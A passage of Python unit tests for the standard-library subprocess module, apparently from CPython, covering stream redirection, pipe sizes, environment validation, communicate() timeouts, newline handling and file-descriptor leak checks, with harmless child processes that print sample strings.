tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b"pear")
tf.seek(0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=tf)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdout_pipe(self):
# stdout redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=subprocess.PIPE)
with p:
self.assertEqual(p.stdout.read(), b"orange")
def test_stdout_filedes(self):
# stdout is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=d)
p.wait()
os.lseek(d, 0, 0)
self.assertEqual(os.read(d, 1024), b"orange")
def test_stdout_fileobj(self):
# stdout is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=tf)
p.wait()
tf.seek(0)
self.assertEqual(tf.read(), b"orange")
def test_stderr_pipe(self):
# stderr redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=subprocess.PIPE)
with p:
self.assertEqual(p.stderr.read(), b"strawberry")
def test_stderr_filedes(self):
# stderr is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=d)
p.wait()
os.lseek(d, 0, 0)
self.assertEqual(os.read(d, 1024), b"strawberry")
def test_stderr_fileobj(self):
# stderr is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=tf)
p.wait()
tf.seek(0)
self.assertEqual(tf.read(), b"strawberry")
def test_stderr_redirect_with_no_stdout_redirect(self):
# test stderr=STDOUT while stdout=None (not set)
# - grandchild prints to stderr
# - child redirects grandchild's stderr to its stdout
# - the parent should get grandchild's stderr in child's stdout
p = subprocess.Popen([sys.executable, "-c",
'import sys, subprocess;'
'rc = subprocess.call([sys.executable, "-c",'
' "import sys;"'
' "sys.stderr.write(\'42\')"],'
' stderr=subprocess.STDOUT);'
'sys.exit(rc)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
#NOTE: stdout should get stderr from grandchild
self.assertEqual(stdout, b'42')
self.assertEqual(stderr, b'') # should be empty
self.assertEqual(p.returncode, 0)
def test_stdout_stderr_pipe(self):
# capture stdout and stderr to the same pipe
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
with p:
self.assertEqual(p.stdout.read(), b"appleorange")
def test_stdout_stderr_file(self):
# capture stdout and stderr to the same open file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=tf,
stderr=tf)
p.wait()
tf.seek(0)
self.assertEqual(tf.read(), b"appleorange")
def test_stdout_filedes_of_stdout(self):
# stdout is set to 1 (#1531862).
# To avoid printing the text on stdout, we do something similar to
# test_stdout_none (see above). The parent subprocess calls the child
# subprocess passing stdout=1, and this test uses stdout=PIPE in
# order to capture and check the output of the parent. See #11963.
code = ('import sys, subprocess; '
'rc = subprocess.call([sys.executable, "-c", '
' "import os, sys; sys.exit(os.write(sys.stdout.fileno(), '
'b\'test with stdout=1\'))"], stdout=1); '
'assert rc == 18')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), b'test with stdout=1')
def test_stdout_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'for i in range(10240):'
'print("x" * 1024)'],
stdout=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stdout, None)
def test_stderr_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys\n'
'for i in range(10240):'
'sys.stderr.write("x" * 1024)'],
stderr=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stderr, None)
def test_stdin_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdin.read(1)'],
stdin=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stdin, None)
@unittest.skipUnless(fcntl and hasattr(fcntl, 'F_GETPIPE_SZ'),
'fcntl.F_GETPIPE_SZ required for test.')
def test_pipesizes(self):
test_pipe_r, test_pipe_w = os.pipe()
try:
# Get the default pipesize with F_GETPIPE_SZ
pipesize_default = fcntl.fcntl(test_pipe_w, fcntl.F_GETPIPE_SZ)
finally:
os.close(test_pipe_r)
os.close(test_pipe_w)
pipesize = pipesize_default // 2
if pipesize < 512: # the POSIX minimum
raise unittest.SkitTest(
'default pipesize too small to perform test.')
p = subprocess.Popen(
[sys.executable, "-c",
'import sys; sys.stdin.read(); sys.stdout.write("out"); '
'sys.stderr.write("error!")'],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, pipesize=pipesize)
try:
for fifo in [p.stdin, p.stdout, p.stderr]:
self.assertEqual(
fcntl.fcntl(fifo.fileno(), fcntl.F_GETPIPE_SZ),
pipesize)
# Windows pipe size can be acquired via GetNamedPipeInfoFunction
# https://docs.microsoft.com/en-us/windows/win32/api/namedpipeapi/nf-namedpipeapi-getnamedpipeinfo
# However, this function is not yet in _winapi.
p.stdin.write(b"pear")
p.stdin.close()
finally:
p.kill()
p.wait()
@unittest.skipUnless(fcntl and hasattr(fcntl, 'F_GETPIPE_SZ'),
'fcntl.F_GETPIPE_SZ required for test.')
def test_pipesize_default(self):
p = subprocess.Popen(
[sys.executable, "-c",
'import sys; sys.stdin.read(); sys.stdout.write("out"); '
'sys.stderr.write("error!")'],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, pipesize=-1)
try:
fp_r, fp_w = os.pipe()
try:
default_pipesize = fcntl.fcntl(fp_w, fcntl.F_GETPIPE_SZ)
for fifo in [p.stdin, p.stdout, p.stderr]:
self.assertEqual(
fcntl.fcntl(fifo.fileno(), fcntl.F_GETPIPE_SZ),
default_pipesize)
finally:
os.close(fp_r)
os.close(fp_w)
# On other platforms we cannot test the pipe size (yet). But above
# code using pipesize=-1 should not crash.
p.stdin.close()
finally:
p.kill()
p.wait()
def test_env(self):
newenv = os.environ.copy()
newenv["FRUIT"] = "orange"
with subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
env=newenv) as p:
stdout, stderr = p.communicate()
self.assertEqual(stdout, b"orange")
# Windows requires at least the SYSTEMROOT environment variable to start
# Python
@unittest.skipIf(sys.platform == 'win32',
'cannot test an empty env on Windows')
@unittest.skipIf(sysconfig.get_config_var('Py_ENABLE_SHARED') == 1,
'The Python shared library cannot be loaded '
'with an empty environment.')
def test_empty_env(self):
"""Verify that env={} is as empty as possible."""
def is_env_var_to_ignore(n):
"""Determine if an environment variable is under our control."""
# This excludes some __CF_* and VERSIONER_* keys MacOS insists
# on adding even when the environment in exec is empty.
# Gentoo sandboxes also force LD_PRELOAD and SANDBOX_* to exist.
return ('VERSIONER' in n or '__CF' in n or # MacOS
n == 'LD_PRELOAD' or n.startswith('SANDBOX') or # Gentoo
n == 'LC_CTYPE') # Locale coercion triggered
with subprocess.Popen([sys.executable, "-c",
'import os; print(list(os.environ.keys()))'],
stdout=subprocess.PIPE, env={}) as p:
stdout, stderr = p.communicate()
child_env_names = eval(stdout.strip())
self.assertIsInstance(child_env_names, list)
child_env_names = [k for k in child_env_names
if not is_env_var_to_ignore(k)]
self.assertEqual(child_env_names, [])
def test_invalid_cmd(self):
# null character in the command name
cmd = sys.executable + '\0'
with self.assertRaises(ValueError):
subprocess.Popen([cmd, "-c", "pass"])
# null character in the command argument
with self.assertRaises(ValueError):
subprocess.Popen([sys.executable, "-c", "pass#\0"])
def test_invalid_env(self):
# null character in the environment variable name
newenv = os.environ.copy()
newenv["FRUIT\0VEGETABLE"] = "cabbage"
with self.assertRaises(ValueError):
subprocess.Popen(ZERO_RETURN_CMD, env=newenv)
# null character in the environment variable value
newenv = os.environ.copy()
newenv["FRUIT"] = "orange\0VEGETABLE=cabbage"
with self.assertRaises(ValueError):
subprocess.Popen(ZERO_RETURN_CMD, env=newenv)
# equal character in the environment variable name
newenv = os.environ.copy()
newenv["FRUIT=ORANGE"] = "lemon"
with self.assertRaises(ValueError):
subprocess.Popen(ZERO_RETURN_CMD, env=newenv)
# equal character in the environment variable value
newenv = os.environ.copy()
newenv["FRUIT"] = "orange=lemon"
with subprocess.Popen([sys.executable, "-c",
'import sys, os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
env=newenv) as p:
stdout, stderr = p.communicate()
self.assertEqual(stdout, b"orange=lemon")
def test_communicate_stdin(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.communicate(b"pear")
self.assertEqual(p.returncode, 1)
def test_communicate_stdout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("pineapple")'],
stdout=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, b"pineapple")
self.assertEqual(stderr, None)
def test_communicate_stderr(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("pineapple")'],
stderr=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertEqual(stderr, b"pineapple")
def test_communicate(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stderr.write("pineapple");'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
(stdout, stderr) = p.communicate(b"banana")
self.assertEqual(stdout, b"banana")
self.assertEqual(stderr, b"pineapple")
def test_communicate_timeout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os,time;'
'sys.stderr.write("pineapple\\n");'
'time.sleep(1);'
'sys.stderr.write("pear\\n");'
'sys.stdout.write(sys.stdin.read())'],
universal_newlines=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.assertRaises(subprocess.TimeoutExpired, p.communicate, "banana",
timeout=0.3)
# Make sure we can keep waiting for it, and that we get the whole output
# after it completes.
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, "banana")
self.assertEqual(stderr.encode(), b"pineapple\npear\n")
def test_communicate_timeout_large_output(self):
# Test an expiring timeout while the child is outputting lots of data.
p = subprocess.Popen([sys.executable, "-c",
'import sys,os,time;'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'],
stdout=subprocess.PIPE)
self.assertRaises(subprocess.TimeoutExpired, p.communicate, timeout=0.4)
(stdout, _) = p.communicate()
self.assertEqual(len(stdout), 4 * 64 * 1024)
# Test for the fd leak reported in http://bugs.python.org/issue2791.
def test_communicate_pipe_fd_leak(self):
for stdin_pipe in (False, True):
for stdout_pipe in (False, True):
for stderr_pipe in (False, True):
options = {}
if stdin_pipe:
options['stdin'] = subprocess.PIPE
if stdout_pipe:
options['stdout'] = subprocess.PIPE
if stderr_pipe:
options['stderr'] = subprocess.PIPE
if not options:
continue
p = subprocess.Popen(ZERO_RETURN_CMD, **options)
p.communicate()
if p.stdin is not None:
self.assertTrue(p.stdin.closed)
if p.stdout is not None:
self.assertTrue(p.stdout.closed)
if p.stderr is not None:
self.assertTrue(p.stderr.closed)
def test_communicate_returns(self):
# communicate() should return None if no redirection is active
p = subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(47)"])
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertEqual(stderr, None)
def test_communicate_pipe_buf(self):
# communicate() with writes larger than pipe_buf
# This test will probably deadlock rather than fail, if
# communicate() does not work properly.
x, y = os.pipe()
os.close(x)
os.close(y)
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read(47));'
'sys.stderr.write("x" * %d);'
'sys.stdout.write(sys.stdin.read())' %
support.PIPE_MAX_SIZE],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
string_to_write = b"a" * support.PIPE_MAX_SIZE
(stdout, stderr) = p.communicate(string_to_write)
self.assertEqual(stdout, string_to_write)
def test_writes_before_communicate(self):
# stdin.write before communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.stdin.write(b"banana")
(stdout, stderr) = p.communicate(b"split")
self.assertEqual(stdout, b"bananasplit")
self.assertEqual(stderr, b"")
def test_universal_newlines_and_text(self):
args = [
sys.executable, "-c",
'import sys,os;' + SETBINARY +
'buf = sys.stdout.buffer;'
'buf.write(sys.stdin.readline().encode());'
'buf.flush();'
'buf.write(b"line2\\n");'
'buf.flush();'
'buf.write(sys.stdin.read().encode());'
'buf.flush();'
'buf.write(b"line4\\n");'
'buf.flush();'
'buf.write(b"line5\\r\\n");'
'buf.flush();'
'buf.write(b"line6\\r");'
'buf.flush();'
'buf.write(b"\\nline7");'
'buf.flush();'
'buf.write(b"\\nline8");']
for extra_kwarg in ('universal_newlines', 'text'):
p = subprocess.Popen(args, **{'stdin': subprocess.PIPE,
'stdout': subprocess.PIPE,
extra_kwarg: True})
with p:
p.stdin.write("line1\n")
p.stdin.flush()
self.assertEqual(p.stdout.readline(), "line1\n")
p.stdin.write("line3\n")
p.stdin.close()
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.readline(),
"line2\n")
self.assertEqual(p.stdout.read(6),
"line3\n")
self.assertEqual(p.stdout.read(),
"line4\nline5\nline6\nline7\nline8")
def test_universal_newlines_communicate(self):
# universal newlines through communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY +
'buf = sys.stdout.buffer;'
'buf.write(b"line2\\n");'
'buf.flush();'
'buf.write(b"line4\\n");'
'buf.flush();'
'buf.write(b"line5\\r\\n");'
'buf.flush();'
'buf.write(b"line6\\r");'
'buf.flush();'
'buf.write(b"\\nline7");'
'buf.flush();'
'buf.write(b"\\nline8");'],
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=1)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout,
"line2\nline4\nline5\nline6\nline7\nline8")
def test_universal_newlines_communicate_stdin(self):
# universal newlines through communicate(), with only stdin
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY + textwrap.dedent('''
s = sys.stdin.readline()
assert s == "line1\\n", repr(s)
s = sys.stdin.read()
assert s == "line3\\n", repr(s)
''')],
stdin=subprocess.PIPE,
universal_newlines=1)
(stdout, stderr) = p.communicate("line1\nline3\n")
self.assertEqual(p.returncode, 0)
def test_universal_newlines_communicate_input_none(self):
# Test communicate(input=None) with universal newlines.
#
# We set stdout to PIPE because, as of this writing, a different
# code path is tested when the number of pipes is zero or one.
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=True)
p.communicate()
self.assertEqual(p.returncode, 0)
def test_universal_newlines_communicate_stdin_stdout_stderr(self):
# universal newlines through communicate(), with stdin, stdout, stderr
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY + textwrap.dedent('''
s = sys.stdin.buffer.readline()
sys.stdout.buffer.write(s)
sys.stdout.buffer.write(b"line2\\r")
sys.stderr.buffer.write(b"eline2\\n")
s = sys.stdin.buffer.read()
sys.stdout.buffer.write(s)
sys.stdout.buffer.write(b"line4\\n")
sys.stdout.buffer.write(b"line5\\r\\n")
sys.stderr.buffer.write(b"eline6\\r")
sys.stderr.buffer.write(b"eline7\\r\\nz")
''')],
stdin=subprocess.PIPE,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=True)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate("line1\nline3\n")
self.assertEqual(p.returncode, 0)
self.assertEqual("line1\nline2\nline3\nline4\nline5\n", stdout)
# Python debug build push something like "[42442 refs]\n"
# to stderr at exit of subprocess.
self.assertTrue(stderr.startswith("eline2\neline6\neline7\n"))
def test_universal_newlines_communicate_encodings(self):
# Check that universal newlines mode works for various encodings,
# in particular for encodings in the UTF-16 and UTF-32 families.
# See issue #15595.
#
# UTF-16 and UTF-32-BE are sufficient to check both with BOM and
# without, and UTF-16 and UTF-32.
for encoding in ['utf-16', 'utf-32-be']:
code = ("import sys; "
r"sys.stdout.buffer.write('1\r\n2\r3\n4'.encode('%s'))" %
encoding)
args = [sys.executable, '-c', code]
# We set stdin to be non-None because, as of this writing,
# a different code path is used when the number of pipes is
# zero or one.
popen = subprocess.Popen(args,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
encoding=encoding)
stdout, stderr = popen.communicate(input='')
self.assertEqual(stdout, '1\n2\n3\n4')
def test_communicate_errors(self):
for errors, expected in [
('ignore', ''),
('replace', '\ufffd\ufffd'),
('surrogateescape', '\udc80\udc80'),
('backslashreplace', '\\x80\\x80'),
]:
code = ("import sys; "
r"sys.stdout.buffer.write(b'[\x80\x80]')")
args = [sys.executable, '-c', code]
# We set stdin to be non-None because, as of this writing,
# a different code path is used when the number of pipes is
# zero or one.
popen = subprocess.Popen(args,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
encoding='utf-8',
errors=errors)
stdout, stderr = popen.communicate(input='')
self.assertEqual(stdout, '[{}]'.format(expected))
def test_no_leaking(self):
# Make sure we leak no resources
if not mswindows:
max_handles = 1026 # too much for most UNIX systems
else:
max_handles = 2050 # too much for (at least some) Windows setups
handles = []
tmpdir = tempfile.mkdtemp()
try:
for i in range(max_handles):
try:
tmpfile = os.path.join(tmpdir, os_helper.TESTFN)
handles.append(os.open(tmpfile, os.O_WRONLY|os.O_CREAT))
except OSError as e:
if e.errno != errno.EMFILE:
raise
break
else:
self.skipTest("failed to reach the file descriptor limit "
"(tried %d)" % max_handles)
# Close a couple of them (should be enough for a subprocess)
for i in range(10):
os.close(handles.pop())
# Loop creating some subprocesses. If one of them leaks some fds,
# the next loop iteration will fail by reaching the max fd limit.
for i in range(15):
p = subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write(sys.stdin.read())"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
data = p.communicate(b"lime")[0]
self.assertEqual(data, b"lime")
finally:
for h in handles:
os.close(h)
shutil.rmtree(tmpdir)
def test_list2cmdline(self):
self.assertEqual(subprocess.list2cmdline(['a b c', 'd', 'e']),
'"a b c" d e')
self.assertEqual(subprocess.list2cmdline(['ab"c', '\\', 'd']),
'ab\\"c \\ d')
self.assertEqual(subprocess.list2cmdline(['ab"c', ' \\', 'd']),
'ab\\"c " \\\\" d')
self.assertEqual(subprocess.list2cmdline(['a\\\\\\b', 'de fg', 'h']),
'a\\\\\\b "de fg" h')
self.assertEqual(subprocess.list2cmdline(['a\\"b', 'c', 'd']),
'a\\\\\\"b c d')
self.assertEqual(subprocess.list2cmdline(['a\\\\b c', 'd', 'e']),
'"a\\\\b c" d e')
self.assertEqual(subprocess.list2cmdline(['a\\\\b\\ c', 'd', 'e']),
'"a\\\\b\\ c" d e')
self.assertEqual(subprocess.list2cmdline(['ab', '']),
'ab ""')
def test_poll(self):
p = subprocess.Popen([sys.executable, "-c",
"import os; os.read(0, 1)"],
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
self.assertIsNone(p.poll())
os.write(p.stdin.fileno(), b'A')
p.wait()
# Subsequent invocations should just return the returncode
self.assertEqual(p.poll(), 0)
def test_wait(self):
p = subprocess.Popen(ZERO_RETURN_CMD)
self.assertEqual(p.wait(), 0)
# Subsequent invocations should just return the returncode
self.assertEqual(p.wait(), 0)
def test_wait_timeout(self):
p = subprocess.Popen([sys.executable,
"-c", "import time; time.sleep(0.3)"])
with self.assertRaises(subprocess.TimeoutExpired) as c:
p.wait(timeout=0.0001)
self.assertIn("0.0001", str(c.exception)) # For coverage of __str__.
self.assertEqual(p.wait(timeout=support.SHORT_TIMEOUT), 0)
def test_invalid_bufsize(self):
# an invalid type of the bufsize argument should raise
# TypeError.
with self.assertRaises(TypeError):
subprocess.Popen(ZERO_RETURN_CMD, "orange")
def test_bufsize_is_none(self):
# bufsize=None should be the same as bufsize=0.
p = subprocess.Popen(ZERO_RETURN_CMD, None)
self.assertEqual(p.wait(), 0)
# Again with keyword arg
p = subprocess.Popen(ZERO_RETURN_CMD, bufsize=None)
self.assertEqual(p.wait(), 0)
def _test_bufsize_equal_one(self, line, expected, universal_newlines):
# subprocess may deadlock with bufsize=1, see issue #21332
with subprocess.Popen([sys.executable, "-c", "import sys;"
"sys.stdout.write(sys.stdin.readline());"
"sys.stdout.flush()"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL,
bufsize=1,
universal_newlines=universal_newlines) as p:
p.stdin.write(line) # expect that it flushes the line in text mode
os.close(p.stdin.fileno()) # close it without flushing the buffer
read_line = p.stdout.readline()
with support.SuppressCrashReport():
try:
p.stdin.close()
except OSError:
pass
p.stdin = None
self.assertEqual(p.returncode, 0)
self.assertEqual(read_line, expected)
def test_bufsize_equal_one_text_mode(self):
# line is flushed in text mode with bufsize=1.
# we should get the full line in return
line = "line\n"
self._test_bufsize_equal_one(line, line, universal_newlines=True)
def test_bufsize_equal_one_binary_mode(self):
# line is not flushed in binary mode with bufsize=1.
# we should get empty response
line = b'line' + os.linesep.encode() # assume ascii-based locale
with self.assertWarnsRegex(RuntimeWarning, 'line buffering'):
self._test_bufsize_equal_one(line, b'', universal_newlines=False)
def test_leaking_fds_on_error(self):
# see bug #5179: Popen leaks file descriptors to PIPEs if
# the child fails to execute; this will eventually exhaust
# the maximum number of open fds. 1024 seems a very common
# value for that limit, but Windows has 2048, so we loop
# 1024 times (each call leaked two fds).
for i in range(1024):
with self.assertRaises(NONEXISTING_ERRORS):
subprocess.Popen(NONEXISTING_CMD,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
def test_nonexisting_with_pipes(self):
# bpo-30121: Popen with pipes must close properly pipes on error.
# Previously, os.close() was called with a Windows handle which is not
# a valid file descriptor.
#
# Run the test in a subprocess to control how the CRT reports errors
# and to get stderr content.
try:
import msvcrt
msvcrt.CrtSetReportMode
except (AttributeError, ImportError):
self.skipTest("need msvcrt.CrtSetReportMode")
code = textwrap.dedent(f"""
import msvcrt
import subprocess
cmd = {NONEXISTING_CMD!r}
for report_type in [msvcrt.CRT_WARN,
msvcrt.CRT_ERROR,
msvcrt.CRT_ASSERT]:
msvcrt.CrtSetReportMode(report_type, msvcrt.CRTDBG_MODE_FILE)
msvcrt.CrtSetReportFile(report_type, msvcrt.CRTDBG_FILE_STDERR)
try:
subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
except OSError:
pass
""")
cmd = [sys.executable, "-c", code]
proc = subprocess.Popen(cmd,
stderr=subprocess.PIPE,
universal_newlines=True)
with proc:
stderr = proc.communicate()[1]
self.assertEqual(stderr, "")
self.assertEqual(proc.returncode, 0)
def test_double_close_on_error(self):
# Issue #18851
fds = []
def open_fds():
for i in range(20):
fds.extend(os.pipe())
time.sleep(0.001)
t = threading.Thread(target=open_fds)
t.start()
try:
with self.assertRaises(EnvironmentError):
subprocess.Popen(NONEXISTING_CMD,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
finally:
t.join()
exc = None
for fd in fds:
# If a double close occurred, some of those fds will
# already have been closed by mistake, and os.close()
# here will raise.
try:
os.close(fd)
except OSError as e:
exc = e
if exc is not None:
raise exc
def test_threadsafe_wait(self):
"""Issue21291: Popen.wait() needs to be threadsafe for returncode."""
proc = subprocess.Popen([sys.executable, '-c',
'import time; time.sleep(12)'])
self.assertEqual(proc.returncode, None)
results = []
def kill_proc_timer_thread():
results.append(('thread-start-poll-result', proc.poll()))
# terminate it from the thread and wait for the result.
proc.kill()
proc.wait()
results.append(('thread-after-kill-and-wait', proc.returncode))
# this wait should be a no-op given the above.
proc.wait()
results.append(('thread-after-second-wait', proc.returncode))
# This is a timing sensitive test, the failure mode is
# triggered when both the main thread and this thread are in
# the wait() call at once. The delay here is to allow the
# main thread to most likely be blocked in its wait() call.
t = threading.Timer(0.2, kill_proc_timer_thread)
t.start()
if mswindows:
expected_errorcode = 1
else:
# Should be -9 because of the proc.kill() from the thread.
expected_errorcode = -9
# Wait for the process to finish; the thread should kill it
# long before it finishes on its own. Supplying a timeout
# triggers a different code path for better coverage.
proc.wait(timeout=support.SHORT_TIMEOUT)
self.assertEqual(proc.returncode, expected_errorcode,
msg="unexpected result in wait from main thread")
# This should be a no-op with no change in returncode.
proc.wait()
self.assertEqual(proc.returncode, expected_errorcode,
msg="unexpected result in second main wait.")
t.join()
# Ensure that all of the thread results are as expected.
# When a race condition occurs in wait(), the returncode could
# be set by the wrong thread that doesn't actually have it
# leading to an incorrect value.
self.assertEqual([('thread-start-poll-result', None),
('thread-after-kill-and-wait', expected_errorcode),
('thread-after-second-wait', expected_errorcode)],
results)
def test_issue8780(self):
# Ensure that stdout is inherited from the parent
# if stdout=PIPE is not used
code = ';'.join((
'import subprocess, sys',
'retcode = subprocess.call('
"[sys.executable, '-c', 'print(\"Hello World!\")'])",
'assert retcode == 0'))
output = subprocess.check_output([sys.executable, '-c', code])
self.assertTrue(output.startswith(b'Hello World!'), ascii(output))
def test_handles_closed_on_exception(self):
# If CreateProcess exits with an error, ensure the
# duplicate output handles are released
ifhandle, ifname = tempfile.mkstemp()
ofhandle, ofname = tempfile.mkstemp()
efhandle, efname = tempfile.mkstemp()
try:
subprocess.Popen (["*"], stdin=ifhandle, stdout=ofhandle,
stderr=efhandle)
except OSError:
os.close(ifhandle)
os.remove(ifname)
os.close(ofhandle)
os.remove(ofname)
os.close(efhandle)
os.remove(efname)
self.assertFalse(os.path.exists(ifname))
self.assertFalse(os.path.exists(ofname))
self.assertFalse(os.path.exists(efname))
def test_communicate_epipe(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.communicate(b"x" * 2**20)
def test_repr(self):
path_cmd = pathlib.Path("my-tool.py")
pathlib_cls = path_cmd.__class__.__name__
cases = [
("ls", True, 123, "<Popen: returncode: 123 args: 'ls'>"),
('a' * 100, True, 0,
"<Popen: returncode: 0 args: 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...>"),
(["ls"], False, None, "<Popen: returncode: None args: ['ls']>"),
(["ls", '--my-opts', 'a' * 100], False, None,
"<Popen: returncode: None args: ['ls', '--my-opts', 'aaaaaaaaaaaaaaaaaaaaaaaa...>"),
(path_cmd, False, 7, f"<Popen: returncode: 7 args: {pathlib_cls}('my-tool.py')>")
]
with unittest.mock.patch.object(subprocess.Popen, '_execute_child'):
for cmd, shell, code, sx in cases:
p = subprocess.Popen(cmd, shell=shell)
p.returncode = code
self.assertEqual(repr(p), sx)
def test_communicate_epipe_only_stdin(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
p.wait()
p.communicate(b"x" * 2**20)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'),
"Requires signal.SIGUSR1")
@unittest.skipUnless(hasattr(os, 'kill'),
"Requires os.kill")
@unittest.skipUnless(hasattr(os, 'getppid'),
"Requires os.getppid")
def test_communicate_eintr(self):
# Issue #12493: communicate() should handle EINTR
def handler(signum, frame):
pass
old_handler = signal.signal(signal.SIGUSR1, handler)
self.addCleanup(signal.signal, signal.SIGUSR1, old_handler)
args = [sys.executable, "-c",
'import os, signal;'
'os.kill(os.getppid(), signal.SIGUSR1)']
for stream in ('stdout', 'stderr'):
kw = {stream: subprocess.PIPE}
with subprocess.Popen(args, **kw) as process:
# communicate() will be interrupted by SIGUSR1
process.communicate()
# This test is Linux-ish specific for simplicity to at least have
# some coverage. It is not a platform specific bug.
@unittest.skipUnless(os.path.isdir('/proc/%d/fd' % os.getpid()),
"Linux specific")
def test_failed_child_execute_fd_leak(self):
"""Test for the fork() failure fd leak reported in issue16327."""
fd_directory = '/proc/%d/fd' % os.getpid()
